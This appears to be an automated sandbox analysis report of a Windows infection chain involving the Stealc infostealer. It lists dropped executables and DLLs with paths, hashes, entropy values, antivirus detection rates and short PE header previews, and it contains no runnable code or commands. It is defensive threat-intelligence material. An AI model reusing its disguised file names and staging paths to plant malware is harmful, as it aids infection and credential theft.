Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3024384
Entropy (8bit):	6.520311944109943
Encrypted:	false
SSDEEP:	49152:7h+1X0gVt9n8RLfp9ePqvSKkFf7AILEL:9+1X08t9na2iZeLEL
MD5:	6250E716BE9BB3618C85DA75BB8A8351
SHA1:	60533E737BDDEF80D4E94C103109EE8677639196
SHA-256:	2E392125F3B243B95CBE940912E0483DB711C2820937FB684862F519FEF9FB69
SHA-512:	A13A28E597A460509F06A3EC1BD425BC277E9F8BDAAA009EEB063D2398CFCD9ECA1A2A3A7963B47F8BEB516460E40E4D0A5A41FE6BC6A278B145AE22BA97C408
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...wrsfsivy.p+......p+.................@...bfxftgti..... 1.....................@....taggant.0...01.."..................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2137600
Entropy (8bit):	7.961389881797388
Encrypted:	false
SSDEEP:	49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
MD5:	212E008D0B8A1D4874846987F37E34FA
SHA1:	0C125B1139DBBB0AA2FEDFB916D1365001CCE1E9
SHA-256:	D9D47FD94A18E02CB473EC8ED22D7D7F6CE79825F999D129D662F71409A48082
SHA-512:	F2D886EF7CEDC828234029B48BB146C449ECDF7D2D293C759AF6DC61F873FE873BE5CBEA21B9C07FD6ED868AA8B32CBA804B79BD788475F53490B54872E7D0D6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......r...........@...........................r......B!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...cbbjugzk......X.....................@...lfmofsyx.....pr......x .............@....taggant.0....r.."...\| .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224767
Entropy (8bit):	7.973762647331916
Encrypted:	false
SSDEEP:	24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
MD5:	5D97C2475C8A4D52E140EF4650D1028B
SHA1:	DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
SHA-256:	F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
SHA-512:	22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7110656
Entropy (8bit):	6.076540689462371
Encrypted:	false
SSDEEP:	49152:/zIEPn3XBZiN8H42XBegbR6wvWiIPm2WLrSrx2bagbq9e2hiPQuFKxb+0KKJXMNS:/zBBZir2RVbRePhyrycbRqY9K1
MD5:	87E4E869971CEC9573811040F6140157
SHA1:	6308D9E243317A829D602C6A2F667FFF6D05D148
SHA-256:	0AD7E833D526131900916008913DEC998360EE6D1A9AACF3997602E1CFC1C3E3
SHA-512:	71F1040D823DEB28361966E41F0CBA63D735425EDC83C9D790B1BFFC2ABE97EB5FE2642358B0AA3B9A505230D87049C0D36F84E58499575D2D5983926DF0E881
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yZ"g...............(..F..\|l..2............F...@...........................m.......m...@... ...............................i.P(............................i.p.............................i.......................i.p............................text...L.F.......F.................`..`.data... .....F.......F.............@....rdata...j....T..l....T.............@..@.eh_framP/... i..0....i.............@..@.bss....`1...Pi..........................idata..P(....i..*...6i.............@....CRT....0.....i......`i.............@....tls..........i......bi.............@....reloc..p.....i......di.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	665088
Entropy (8bit):	7.641303787368916
Encrypted:	false
SSDEEP:	12288:3KbQTjM37Fhgr4ZNkE1Er41iaNhqqitQ+jHKVkdvXPg9O/1ACWFtIK5NcDU:nTY37wr4ZyprDGqqitSkxPg41XgtF5Wo
MD5:	E3D038EE8743EEB4759105852F8C9973
SHA1:	C029F68A065ECBAF124F2D8569FC3D097CFF8DA9
SHA-256:	250784E06AC98AD9183950EF5EC3549C2A5E2FFB0306F167AE84C4CB55B12922
SHA-512:	F45BA1D08582AD5DAF8B09FAA52807169542B29054204DA2E346F9DBD84D93041452503EC87617979B326A3D9E00EFE18FE7CC6BAA377C6E99327161BB886445
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....n"g............................B.............@.......................................@.....................................(............................@..l ..........................`.......x...............\...L............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg....... ......................@..@.tls.........0......................@....reloc..l ...@..."..................@..B.bss.........p..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.339215930674792
Encrypted:	false
SSDEEP:	6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
MD5:	68A99CF42959DC6406AF26E91D39F523
SHA1:	F11DB933A83400136DC992820F485E0B73F1B933
SHA-256:	C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
SHA-512:	7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7110656
Entropy (8bit):	6.076540689462371
Encrypted:	false
SSDEEP:	49152:/zIEPn3XBZiN8H42XBegbR6wvWiIPm2WLrSrx2bagbq9e2hiPQuFKxb+0KKJXMNS:/zBBZir2RVbRePhyrycbRqY9K1
MD5:	87E4E869971CEC9573811040F6140157
SHA1:	6308D9E243317A829D602C6A2F667FFF6D05D148
SHA-256:	0AD7E833D526131900916008913DEC998360EE6D1A9AACF3997602E1CFC1C3E3
SHA-512:	71F1040D823DEB28361966E41F0CBA63D735425EDC83C9D790B1BFFC2ABE97EB5FE2642358B0AA3B9A505230D87049C0D36F84E58499575D2D5983926DF0E881
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yZ"g...............(..F..\|l..2............F...@...........................m.......m...@... ...............................i.P(............................i.p.............................i.......................i.p............................text...L.F.......F.................`..`.data... .....F.......F.............@....rdata...j....T..l....T.............@..@.eh_framP/... i..0....i.............@..@.bss....`1...Pi..........................idata..P(....i..*...6i.............@....CRT....0.....i......`i.............@....tls..........i......bi.............@....reloc..p.....i......di.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224767
Entropy (8bit):	7.973762647331916
Encrypted:	false
SSDEEP:	24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
MD5:	5D97C2475C8A4D52E140EF4650D1028B
SHA1:	DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
SHA-256:	F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
SHA-512:	22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5952512
Entropy (8bit):	7.874022549731662
Encrypted:	false
SSDEEP:	98304:S1DARPEaQuozISL3R0yFmGPwnvYw9iyiqWAWjuQCmtGlSliMhabgxEA:oFzuCII9CniytWjuQTtASl9hasb
MD5:	5009B1EF6619ECA039925510D4FD51A1
SHA1:	22626AA57E21291A995615F9F6BBA083D8706764
SHA-256:	FBC8C32BF799A005C57540A2E85DD3662ED5795A55F11495F0BA569BBB09DF59
SHA-512:	2B5BBD9449BE00588058966DB487C0ADFAC764827A6691F6A9FC6C3A770A93BDA11C732D2EB2A3C660697CBC69B1C71A2BF76D2957F65CD2599FB28098B24F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............K...........@..........................P........[...@...................................>......`.......................P..\.................................................... 0..............................text....I.......................... ..`.rdata..=%...`......................@..@.data...............................@....vmp.+........................... ..`.vmp.+d.... 0.....................@....vmp.+P.X..00...X................. ..`.reloc..\....P......."X.............@..@.rsrc........`.......X.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3024384
Entropy (8bit):	6.520311944109943
Encrypted:	false
SSDEEP:	49152:7h+1X0gVt9n8RLfp9ePqvSKkFf7AILEL:9+1X08t9na2iZeLEL
MD5:	6250E716BE9BB3618C85DA75BB8A8351
SHA1:	60533E737BDDEF80D4E94C103109EE8677639196
SHA-256:	2E392125F3B243B95CBE940912E0483DB711C2820937FB684862F519FEF9FB69
SHA-512:	A13A28E597A460509F06A3EC1BD425BC277E9F8BDAAA009EEB063D2398CFCD9ECA1A2A3A7963B47F8BEB516460E40E4D0A5A41FE6BC6A278B145AE22BA97C408
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...wrsfsivy.p+......p+.................@...bfxftgti..... 1.....................@....taggant.0...01.."..................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	660480
Entropy (8bit):	7.64329230449762
Encrypted:	false
SSDEEP:	12288:UuM8OZLrEIC6jejDTN2kNhqqitQ+jHKVkdvXPg9O/1ACWFtIC5NcDU:dI4I50fsYqqitSkxPg41Xgtp5WDU
MD5:	BDF3C509A0751D1697BA1B1B294FD579
SHA1:	3A3457E5A8B41ED6F42B3197CFF53C8EC50B4DB2
SHA-256:	D3948AE31C42FCBA5D9199E758D145FF74DAD978C80179AFB3148604C254BE6D
SHA-512:	AA81CCBAE9F622531003F1737D22872AE909B28359DFB94813A39D74BDE757141D7543681793102A1DC3DCAECEA27CFFD0363DE8BBB48434FCF8B6DAFEF320B3
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...q. g..........................................@.......................................@.....................................(............................0... ..........................`u......x...................P............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg..............................@..@.tls......... ......................@....reloc... ...0..."..................@..B.call........`..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.761223756666625
Encrypted:	false
SSDEEP:	6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
MD5:	FBA8F56206955304B2A6207D9F5E8032
SHA1:	F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
SHA-256:	11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
SHA-512:	56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8537006129630296
Encrypted:	false
SSDEEP:	3:hGQRALjVLeJKuWJu:hCVLWqu
MD5:	A1CA4BEBCD03FAFBE2B06A46A694E29A
SHA1:	FFC88125007C23FF6711147A12F9BBA9C3D197ED
SHA-256:	C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
SHA-512:	6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
Malicious:	false
Preview:	This content is no longer available.

C:\Users\user\AppData\Local\Temp\1001425001\shop.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	665088
Entropy (8bit):	7.641303787368916
Encrypted:	false
SSDEEP:	12288:3KbQTjM37Fhgr4ZNkE1Er41iaNhqqitQ+jHKVkdvXPg9O/1ACWFtIK5NcDU:nTY37wr4ZyprDGqqitSkxPg41XgtF5Wo
MD5:	E3D038EE8743EEB4759105852F8C9973
SHA1:	C029F68A065ECBAF124F2D8569FC3D097CFF8DA9
SHA-256:	250784E06AC98AD9183950EF5EC3549C2A5E2FFB0306F167AE84C4CB55B12922
SHA-512:	F45BA1D08582AD5DAF8B09FAA52807169542B29054204DA2E346F9DBD84D93041452503EC87617979B326A3D9E00EFE18FE7CC6BAA377C6E99327161BB886445
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....n"g............................B.............@.......................................@.....................................(............................@..l ..........................`.......x...............\...L............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg....... ......................@..@.tls.........0......................@....reloc..l ...@..."..................@..B.bss.........p..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2137600
Entropy (8bit):	7.961389881797388
Encrypted:	false
SSDEEP:	49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
MD5:	212E008D0B8A1D4874846987F37E34FA
SHA1:	0C125B1139DBBB0AA2FEDFB916D1365001CCE1E9
SHA-256:	D9D47FD94A18E02CB473EC8ED22D7D7F6CE79825F999D129D662F71409A48082
SHA-512:	F2D886EF7CEDC828234029B48BB146C449ECDF7D2D293C759AF6DC61F873FE873BE5CBEA21B9C07FD6ED868AA8B32CBA804B79BD788475F53490B54872E7D0D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......r...........@...........................r......B!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...cbbjugzk......X.....................@...lfmofsyx.....pr......x .............@....taggant.0....r.."...\| .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2874880
Entropy (8bit):	6.557349853737172
Encrypted:	false
SSDEEP:	49152:KB88yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy4:KBrWV0C6DVlt8HeUjoT7gH
MD5:	DA2EA6B51A3216E065B2CED231C9E57F
SHA1:	EE7EA72BD395654CB1126D9445A130B9BCBC21F0
SHA-256:	55A539C066DCCA8B451445A6BC712FED79B4984297E86E629FBB74E50256FA8E
SHA-512:	7C72F9DCF959DE9F012DD06841F6E3DEFA892A5F3AB5ED20A667D4FAC0C613B8E5CE34699590D720FD7A38FB7F62FFC7DC77AA027713FAD558EB84F371A49ABB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J........................@.......................... /.......+...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...wjqxmzgq.0)......$).................@...xobrrexd..............+.............@....taggant.0......."....+.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\197036\T

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	false
